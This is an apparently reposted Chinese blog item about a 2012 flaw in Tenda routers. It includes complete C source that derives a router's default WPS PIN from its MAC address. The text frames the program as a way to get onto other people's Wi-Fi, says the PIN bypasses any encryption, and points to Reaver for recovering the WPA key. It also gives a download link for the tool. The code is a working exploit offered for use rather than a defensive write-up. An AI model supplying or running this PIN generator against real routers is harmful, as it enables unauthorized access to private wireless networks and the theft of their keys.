据称，如果您的路由前6位MAC地址是C83A35、081075或者00B00C，那么可以直接由软件计算得出PIN。凭此PIN，可以直接“蹭网”。
只要你的路由打开了QSS（默认都是打开的），按照下文说的计算出了你的PIN，那么管你什么加密方法都可以绕过。pin码具有最高权限，直接提交PIN就可以了。并且由于本次涉及的路由的加密算法不知道是太简单了还是被泄露了，导致大规模破解的出现。

If your wireless router MAC address start with “C83A35″ | “00B00C” | “081075″, type the other six digits, you might be able to get the WPS-PIN of this equipment, please have a try, good luck!

 
//Here is the source
#include ＜stdio.h＞
#include ＜stdlib.h＞

int main()
{

unsigned int wps_pin_checksum(unsigned int pin);
int PIN = 0;

printf("ComputePIN-C83A35\n");
printf("Description:\n");
printf("If your wireless router MAC address start with \"C83A35\",\n");
printf("type the other six digits, you might be able to get the \n");
printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
printf("Input MAC Address(HEX):c83a35");
scanf("%x",&PIN);
printf("MAC Address(HEX) is: C83A35%X\n",PIN);
printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));

return 0;
}

unsigned int wps_pin_checksum(unsigned int pin)
{
unsigned int accum = 0;
while (pin)
{
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
}

return (10 - accum % 10) % 10;
}

via.《ComputePIN-C83A35》

如果您的路由前6位MAC地址是C83A35或者00B00C，那么可以直接由软件计算得出PIN。赵春生在其博客提到，“如果您的路由MAC前6位是C83A35”，输入后六位MAC，您获取可以直接获取到PIN密钥。在其文后并给出相应程序源码。经WiFiBETA等多方验证，证实MAC以00B00C打头的路由也依然可以被计算出PIN。
根据IEEE标准数据库信息，C83A35和00B00C均属于腾达科技旗下的OUI地址，此次受影响的路由包括（但不限于腾达W150M等），腾达型号的具备QSS/WPS连接功能的路由。用户可以直接得出PIN密钥，并通过Reaver获取其WPA PSK密钥。值得一提的是，00B00C这个OUI在IEEE数据库并查询不到。

WiFiBETA.COM对赵春生提供的源码做出少许文本上的修改并提供下载：源码下载请点击这里：http://wifibeta.com/shareing/oui.rar，压缩包MD5：512e588f9cb153109863892e124672f5。已编译的EXE文件请直接在命令行下使用。
via.《PIN计算新突破：部分无线路由可直接由MAC计算出默认PIN》